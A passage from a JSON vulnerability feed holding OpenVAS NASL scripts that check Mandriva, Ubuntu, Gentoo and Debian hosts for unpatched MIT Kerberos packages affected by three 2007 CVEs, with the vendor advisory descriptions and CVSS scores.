rpm:\"krb5-workstation~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53\", rpm:\"libkrb53~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53-devel\", rpm:\"libkrb53-devel~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-client-krb5\", rpm:\"telnet-client-krb5~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-server-krb5\", rpm:\"telnet-server-krb5~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53\", rpm:\"lib64krb53~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53-devel\", rpm:\"lib64krb53-devel~1.4.3~6.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2006.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"ftp-client-krb5\", rpm:\"ftp-client-krb5~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ftp-server-krb5\", rpm:\"ftp-server-krb5~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53\", rpm:\"libkrb53~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53-devel\", rpm:\"libkrb53-devel~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-client-krb5\", rpm:\"telnet-client-krb5~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-server-krb5\", rpm:\"telnet-server-krb5~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53\", rpm:\"lib64krb53~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53-devel\", rpm:\"lib64krb53-devel~1.4.2~2.2.20060mdk\", rls:\"MNDK_2006.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:14", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-04-09T00:00:00", "type": "openvas", "title": "Mandriva Update for krb5 MDKSA-2007:077-1 (krb5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:830144", "href": "http://plugins.openvas.org/nasl.php?oid=830144", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for krb5 MDKSA-2007:077-1 (krb5)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was found in the username handling of the MIT krb5\n telnet daemon. A remote attacker that could access the telnet port\n of a target machine could login as root without requiring a password\n (CVE-2007-0956).\n\n Buffer overflows in the kadmin server daemon were discovered that could\n be exploited by a remote attacker able to access the KDC. Successful\n exploitation could allow for the execution of arbitrary code with\n the privileges of the KDC or kadmin server processes (CVE-2007-0957).\n \n Finally, a double-free flaw was discovered in the GSSAPI library used\n by the kadmin server daemon, which could lead to a denial of service\n condition or the execution of arbitrary code with the privileges of\n the KDC or kadmin server processes (CVE-2007-1216).\n \n Updated packages have been patched to address this issue.\n \n Update:\n \n Packages for Mandriva Linux 2007.1 are now available.\";\n\ntag_affected = \"krb5 on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00010.php\");\n script_id(830144);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"MDKSA\", value: \"2007:077-1\");\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_name( \"Mandriva Update for krb5 MDKSA-2007:077-1 (krb5)\");\n\n script_summary(\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"ftp-client-krb5\", rpm:\"ftp-client-krb5~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ftp-server-krb5\", rpm:\"ftp-server-krb5~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53\", rpm:\"libkrb53~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkrb53-devel\", rpm:\"libkrb53-devel~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-client-krb5\", rpm:\"telnet-client-krb5~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"telnet-server-krb5\", rpm:\"telnet-server-krb5~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53\", rpm:\"lib64krb53~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64krb53-devel\", rpm:\"lib64krb53-devel~1.5.2~6.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:23", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-449-1", "cvss3": {}, "published": "2009-03-23T00:00:00", "type": "openvas", "title": "Ubuntu Update for krb5 vulnerabilities USN-449-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840098", "href": "http://plugins.openvas.org/nasl.php?oid=840098", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_449_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for krb5 vulnerabilities USN-449-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The krb5 telnet service did not appropriately verify user names. A\n remote attacker could log in as the root user by requesting a specially\n crafted user name. (CVE-2007-0956)\n\n The krb5 syslog library did not correctly verify the size of log\n messages. A remote attacker could send a specially crafted message and\n execute arbitrary code with root privileges. (CVE-2007-0957)\n \n The krb5 administration service was vulnerable to a double-free in the\n GSS RPC library. A remote attacker could send a specially crafted\n request and execute arbitrary code with root privileges. (CVE-2007-1216)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-449-1\";\ntag_affected = \"krb5 vulnerabilities on Ubuntu 5.10 ,\n Ubuntu 6.06 LTS ,\n Ubuntu 6.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-449-1/\");\n script_id(840098);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:55:18 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"449-1\");\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_name( \"Ubuntu Update for krb5 vulnerabilities USN-449-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"krb5-admin-server\", ver:\"1.4.3-5ubuntu0.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-clients\", ver:\"1.4.3-5ubuntu0.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-ftpd\", ver:\"1.4.3-5ubuntu0.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-kdc\", ver:\"1.4.3-5ubuntu0.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-rsh-server\", ver:\"1.4.3-5ubuntu0.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-telnetd\", ver:\"1.4.3-5ubuntu0.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-user\", ver:\"1.4.3-5ubuntu0.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkadm55\", ver:\"1.4.3-5ubuntu0.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkrb5-dev\", ver:\"1.4.3-5ubuntu0.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkrb53\", ver:\"1.4.3-5ubuntu0.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-doc\", ver:\"1.4.3-5ubuntu0.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"krb5-admin-server\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-clients\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-ftpd\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-kdc\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-rsh-server\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-telnetd\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-user\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkadm55\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkrb5-dbg\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkrb5-dev\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkrb53\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-doc\", ver:\"1.4.3-9ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU5.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"krb5-admin-server\", ver:\"1.3.6-4ubuntu0.2\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-clients\", ver:\"1.3.6-4ubuntu0.2\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-ftpd\", ver:\"1.3.6-4ubuntu0.2\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-kdc\", ver:\"1.3.6-4ubuntu0.2\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-rsh-server\", ver:\"1.3.6-4ubuntu0.2\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-telnetd\", ver:\"1.3.6-4ubuntu0.2\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-user\", ver:\"1.3.6-4ubuntu0.2\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkadm55\", ver:\"1.3.6-4ubuntu0.2\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkrb5-dev\", ver:\"1.3.6-4ubuntu0.2\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkrb53\", ver:\"1.3.6-4ubuntu0.2\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"krb5-doc\", ver:\"1.3.6-4ubuntu0.2\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:00", "description": "The remote host is missing updates announced in\nadvisory GLSA 200704-02.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200704-02 (mit-krb5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:58189", "href": "http://plugins.openvas.org/nasl.php?oid=58189", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in MIT Kerberos 5 could potentially result in\nunauthenticated remote root code execution.\";\ntag_solution = \"All MIT Kerberos 5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-crypt/mit-krb5-1.5.2-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200704-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=171889\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200704-02.\";\n\n \n\nif(description)\n{\n script_id(58189);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200704-02 (mit-krb5)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-crypt/mit-krb5\", unaffected: make_list(\"ge 1.5.2-r1\"), vulnerable: make_list(\"lt 1.5.2-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:04", "description": "The remote host is missing an update to krb5\nannounced via advisory DSA 1276-1.\n\nSeveral remote vulnerabilities have been discovered in the MIT reference\nimplementation of the Kerberos network authentication protocol suite,\nwhich may lead to the execution of arbitrary code. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2007-0956\n\nIt was discovered that the krb5 telnet daemon performs insufficient\nvalidation of usernames, which might allow unauthorized logins or\nprivilege escalation.\n\nCVE-2007-0957\n\niDefense discovered that a buffer overflow in the logging code of the\nKDC and the administration daemon might lead to arbitrary code\nexecution.\n\nCVE-2007-1216\n\nIt was discovered that a double free in the RPCSEC_GSS part of the\nGSS library code might lead to arbitrary code execution.", "cvss3": {}, "published": "2008-01-17T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1276-1 (krb5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:58328", "href": "http://plugins.openvas.org/nasl.php?oid=58328", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1276_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1276-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 1.3.6-2sarge4.\n\nFor the upcoming stable distribution (etch) these problems have been fixed\nin version 1.4.4-7etch1.\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\nWe recommend that you upgrade your Kerberos packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201276-1\";\ntag_summary = \"The remote host is missing an update to krb5\nannounced via advisory DSA 1276-1.\n\nSeveral remote vulnerabilities have been discovered in the MIT reference\nimplementation of the Kerberos network authentication protocol suite,\nwhich may lead to the execution of arbitrary code. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2007-0956\n\nIt was discovered that the krb5 telnet daemon performs insufficient\nvalidation of usernames, which might allow unauthorized logins or\nprivilege escalation.\n\nCVE-2007-0957\n\niDefense discovered that a buffer overflow in the logging code of the\nKDC and the administration daemon might lead to arbitrary code\nexecution.\n\nCVE-2007-1216\n\nIt was discovered that a double free in the RPCSEC_GSS part of the\nGSS library code might lead to arbitrary code execution.\";\n\n\nif(description)\n{\n script_id(58328);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:17:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1276-1 (krb5)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts 